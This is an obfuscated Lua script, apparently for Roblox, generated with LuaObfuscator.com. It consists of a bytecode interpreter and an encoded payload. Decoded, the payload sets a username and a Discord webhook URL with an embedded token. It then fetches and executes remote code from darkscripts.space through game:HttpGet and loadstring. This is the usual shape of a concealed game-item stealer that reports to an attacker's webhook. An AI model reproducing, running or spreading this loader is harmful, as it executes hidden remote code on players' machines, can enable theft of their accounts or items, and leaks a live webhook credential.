--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v105=v5(v80,v19);v19=nil;return v105;else return v80;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v81=0;local v82;while true do if (v81==(0 -0)) then v82=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(1 + 0))) + (620 -(555 + 64)))) ;return v82-(v82%(932 -(857 + 74))) ;end end else local v83=2^(v32-(569 -(367 + 201))) ;return (((v31%(v83 + v83))>=v83) and (928 -((1091 -(282 + 595)) + 713))) or ((1637 -(1523 + 114)) + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + ((974 -(892 + 65)) -13) ;return (v40 * (16777333 -(32 + 85))) + (v39 * ((153212 -88986) + 1310)) + (v38 * (57 + 199)) + v37 ;end local function v24() local v41=(0 -0) + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(3 -1)) then v46=v20(v43,(897 -(814 + 45)) -(41 -24) ,56 -25 );v47=((v20(v43,(6 + 94) -68 )==(351 -(87 + 263))) and  -(181 -(67 + 113))) or (1 + 0) ;v41=7 -4 ;end if ((9 -6)==v41) then if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=3 -2 ;v44=952 -(802 + 150) ;end elseif (v46==(5511 -3464)) then return ((v45==(1486 -(998 + 488))) and (v47 * ((1 -0)/0))) or (v47 * NaN) ;end return v8(v47,v46-(745 + 278) ) * (v44 + (v45/((999 -(915 + 82))^52))) ;end if (v41==(2 -1)) then v44=1 + 0 ;v45=(v20(v43,1 + 0 ,26 -(891 -(261 + 624)) ) * ((1189 -(1069 + 118))^32)) + v42 ;v41=4 -2 ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 -0 ;end end end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(1 -0)) then v50=v3(v16,v18,(v18 + v48) -(1081 -((1786 -(745 + 21)) + 60)) );v18=v18 + v48 ;v49=1425 -(630 + 793) ;end if ((9 -(3 + 3))==v49) then return v6(v51);end if (v49==(0 -0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=3 -2 ;end if (v49==(1749 -(760 + 987))) then v51={};for v90=1914 -(1789 + 124) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=3;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52==(1880 -(332 + 1546))) then for v92= #"|",v23() do local v93=(function() return v21();end)();if (v20(v93, #"]", #"<")==(1384 -(746 + 638))) then local v100=(function() return 0 + 0 ;end)();local v101=(function() return;end)();local v102=(function() return;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if (v100~=2) then else while true do if (v101== #" ") then local v148=(function() return 0 -0 ;end)();local v149=(function() return;end)();while true do if (v148~=0) then else v149=(function() return 0;end)();while true do if (v149~=1) then else v101=(function() return 343 -(218 + 123) ;end)();break;end if (v149~=0) then else v104=(function() return {v22(),v22(),nil,nil};end)();if (v102==(0 + 0)) then local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (0==v187) then v188=(function() return 0 + 0 ;end)();while true do if (v188==0) then v104[ #"91("]=(function() return v22();end)();v104[ #"xnxx"]=(function() return v22();end)();break;end end break;end end elseif (v102== #"|") then v104[ #"xxx"]=(function() return v23();end)();elseif (v102==2) then v104[ #"gha"]=(function() return v23() -((562 -(306 + 254))^(1 + 15)) ;end)();elseif (v102== #"nil") then local v193=(function() return 0 -0 ;end)();local v194=(function() return;end)();while true do if (v193==0) then v194=(function() return 0;end)();while true do if (v194==0) then v104[ #"xnx"]=(function() return v23() -((1469 -(899 + 568))^16) ;end)();v104[ #"http"]=(function() return v22();end)();break;end end break;end end end v149=(function() return 1;end)();end end break;end end end if (v101==(0 + 0)) then local v150=(function() return 0 -0 ;end)();local v151=(function() return;end)();while true do if (v150==0) then v151=(function() return 603 -(268 + 335) ;end)();while true do if (1~=v151) then else v101=(function() return  #"{";end)();break;end if (v151==(290 -(60 + 230))) then v102=(function() return v20(v93,2, #"19(");end)();v103=(function() return v20(v93, #"asd1",578 -(426 + 146) );end)();v151=(function() return 1 + 0 ;end)();end end break;end end end if (v101== #"19(") then if (v20(v103, #"xxx", #"nil")== #"}") then v104[ #"xnxx"]=(function() return v58[v104[ #".dev"]];end)();end v53[v92]=(function() return v104;end)();break;end if (v101~=(1458 -(282 + 1174))) then else local v153=(function() return 0;end)();while true do if ((812 -(569 + 242))==v153) then v101=(function() return  #"asd";end)();break;end if (0==v153) then if (v20(v103, #" ", #":")== #"[") then v104[2]=(function() return v58[v104[2]];end)();end if (v20(v103,5 -3 ,1 + 1 )== #"~") then v104[ #"19("]=(function() return v58[v104[ #"asd"]];end)();end v153=(function() return 1;end)();end end end end break;end if (v100==1) then local v119=(function() return 1024 -(706 + 318) ;end)();local v120=(function() return;end)();while true do if (v119~=(1251 -(721 + 530))) then else v120=(function() return 1271 -(945 + 326) ;end)();while true do if ((2 -1)==v120) then v100=(function() return 2;end)();break;end if (v120==(0 + 0)) then v103=(function() return nil;end)();v104=(function() return nil;end)();v120=(function() return 1;end)();end end break;end end end if ((700 -(271 + 429))==v100) then local v121=(function() return 0 + 0 ;end)();while true do if (v121~=0) then else v101=(function() return 1500 -(1408 + 92) ;end)();v102=(function() return nil;end)();v121=(function() return 1;end)();end if (v121==1) then v100=(function() return 1087 -(461 + 625) ;end)();break;end end end end end end for v94= #"{",v23() do v54[v94-#"/" ]=(function() return v28();end)();end return v56;end if (v52~=0) then else local v87=(function() return 1288 -(993 + 295) ;end)();while true do if (v87==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v87=(function() return 2;end)();end if (v87==(1 + 1)) then v52=(function() return  #" ";end)();break;end if (v87==(1171 -(418 + 753))) then v53=(function() return {};end)();v54=(function() return {};end)();v87=(function() return 1;end)();end end end if ( #">"~=v52) then else local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88~=(0 + 0)) then else v89=(function() return 0;end)();while true do if (v89==1) then for v123= #"[",v57 do local v124=(function() return 0;end)();local v125=(function() return;end)();local v126=(function() return;end)();while true do if (v124==(0 + 0)) then local v155=(function() return 0;end)();local v156=(function() return;end)();while true do if (v155~=0) then else v156=(function() return 0;end)();while true do if (v156==(0 + 0)) then local v186=(function() return 0;end)();while true do if (v186~=0) then else v125=(function() return v21();end)();v126=(function() return nil;end)();v186=(function() return 1;end)();end if (v186~=(1 + 0)) then else v156=(function() return 1;end)();break;end end end if (v156~=(530 -(406 + 123))) then else v124=(function() return 1770 -(1749 + 20) ;end)();break;end end break;end end end if ((1 + 0)~=v124) then else if (v125== #"[") then v126=(function() return v21()~=0 ;end)();elseif (v125==2) then v126=(function() return v24();end)();elseif (v125== #"19(") then v126=(function() return v25();end)();end v58[v123]=(function() return v126;end)();break;end end end v56[ #"nil"]=(function() return v21();end)();v89=(function() return 2;end)();end if ((1324 -(1249 + 73))==v89) then v52=(function() return 2;end)();break;end if (v89==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v89=(function() return 1 + 0 ;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1];local v63=v59[1147 -(466 + 679) ];local v64=v59[6 -3 ];return function(...) local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=2 -1 ;local v70= -(1901 -(106 + 1794));local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v84=0 + 0 ,v73 do if ((4853>=2982) and (v84>=v67)) then v71[v84-v67 ]=v72[v84 + (2 -1) ];else v75[v84]=v72[v84 + 1 ];end end local v76=(v73-v67) + (2 -1) ;local v77;local v78;while true do v77=v65[v69];v78=v77[115 -(4 + 110) ];if ((v78<=(589 -(57 + 527))) or (443>=4015)) then if (v78<=2) then if (v78<=(1427 -(41 + 1386))) then do return;end elseif ((3382>166) and (v78>(104 -(15 + 2 + 37 + 49)))) then if (v75[v77[1506 -(363 + 1141) ]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else local v127=0;local v128;local v129;local v130;local v131;local v132;while true do if (v127==((1580 -(1183 + 397)) + 0)) then v128=nil;v129,v130=nil;v131=nil;v132=nil;v127=1 -0 ;end if ((4134>3357) and (v127==(5 -3))) then v131=v75[v77[3]];v75[v132 + 1 ]=v131;v75[v132]=v131[v77[170 -(122 + 44) ]];v69=v69 + (1 -0) ;v127=9 -6 ;end if (v127==7) then v69=v69 + 1 + 0 ;v77=v65[v69];v69=v77[1 + 2 ];break;end if (((11 -5)==v127) or (280==3059)) then v75[v132]=v75[v132](v13(v75,v132 + (66 -(30 + 35)) ,v70));v69=v69 + 1 + 0 ;v77=v65[v69];v75[v77[2]]();v127=7;end if ((v127==(1258 -((3175 -2132) + 214))) or (3417<2534)) then v75[v77[7 -5 ]]=v61[v77[1215 -(323 + 889) ]];v69=v69 + (2 -1) ;v77=v65[v69];v132=v77[582 -(361 + 219) ];v127=322 -(53 + 267) ;end if (v127==4) then v132=v77[1 + 1 ];v129,v130=v68(v75[v132](v13(v75,v132 + ((304 + 110) -(15 + 398)) ,v77[985 -(18 + 964) ])));v70=(v130 + v132) -(3 -2) ;v128=0 + 0 ;v127=4 + 1 ;end if ((1881>1293) and (v127==5)) then for v178=v132,v70 do v128=v128 + (851 -(20 + 830)) ;v75[v178]=v129[v128];end v69=v69 + 1 ;v77=v65[v69];v132=v77[2 + 0 ];v127=(99 + 33) -(116 + 10) ;end if ((v127==(1 + 2)) or (2722<=164)) then v77=v65[v69];v75[v77[740 -((2517 -(1913 + 62)) + 196) ]]=v77[(4 + 2) -3 ];v69=v69 + (2 -1) + 0 ;v77=v65[v69];v127=4;end end end elseif (v78<=(2 + 1)) then v61[v77[(1935 -(565 + 1368)) + 1 ]]=v75[v77[4 -(7 -5) ]];elseif ((2357==2357) and (v78==(9 -5))) then local v133=1551 -(1126 + 425) ;local v134;local v135;local v136;local v137;while true do if ((123==123) and (v133==((2067 -(1477 + 184)) -(118 + 287)))) then v70=(v136 + v134) -((3 -0) -2) ;v137=0;v133=(1047 + 76) -(118 + (1859 -(564 + 292))) ;end if ((v133==(0 -0)) or (1056>=3392)) then v134=v77[2];v135,v136=v68(v75[v134](v13(v75,v134 + (378 -(142 + 235)) ,v77[(21 -8) -(30 -20) ])));v133=1;end if (v133==(1 + 1)) then for v181=v134,v70 do v137=v137 + ((1282 -(244 + 60)) -(553 + 424)) ;v75[v181]=v135[v137];end break;end end else v75[v77[3 -1 ]]();end elseif ((v78<=(8 + 0)) or (2408<2109)) then if ((v78<=(6 + 0 + 0)) or (33==1455)) then v61[v77[3]]=v75[v77[2 + 0 ]];v69=v69 + 1 + 0 ;v77=v65[v69];v75[v77[2 + 0 ]]=v77[6 -3 ];v69=v69 + (2 -1) ;v77=v65[v69];v61[v77[6 -3 ]]=v75[v77[1 + 1 ]];v69=v69 + ((480 -(41 + 435)) -3) ;v77=v65[v69];v75[v77[755 -(239 + 514) ]]=v77[3];v69=v69 + 1 + 0 ;v77=v65[v69];v69=v77[1332 -(797 + 532) ];elseif (v78>(6 + 1)) then v75[v77[1 + 1 ]]=v77[6 -3 ];else local v140=v77[1204 -(373 + 829) ];local v141=v75[v77[734 -(476 + 255) ]];v75[v140 + (1131 -(369 + 761)) ]=v141;v75[v140]=v141[v77[3 + 1 ]];end elseif (v78<=((1016 -(938 + 63)) -6)) then v75[v77[3 -1 ]]=v61[v77[241 -(64 + 174) ]];elseif (v78==(2 + 8)) then local v145=v77[2 -0 ];v75[v145]=v75[v145](v13(v75,v145 + (337 -(144 + 192)) ,v70));else v69=v77[219 -(42 + 134 + 40) ];end v69=v69 + 1 + (1125 -(936 + 189)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030A3Q00424F545354415231333203073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3132312Q363735363033363736322Q363539362F6244546131674A385A48703170647542772D4B3263786E526C5F5A2Q68387342316962734E33615F317A443931755779424A53616B39424A7736624E4F35624967776E4300143Q0012083Q00013Q0026023Q000B0001000200040B3Q000B0001001209000100033Q001201000200043Q00202Q00020002000500122Q000400066Q000200046Q00013Q00024Q00010001000100044Q001300010026023Q00010001000100040B3Q00010001001208000100083Q001206000100073Q00122Q0001000A3Q00122Q000100093Q00124Q00023Q00044Q000100016Q00017Q00",v9(),...);
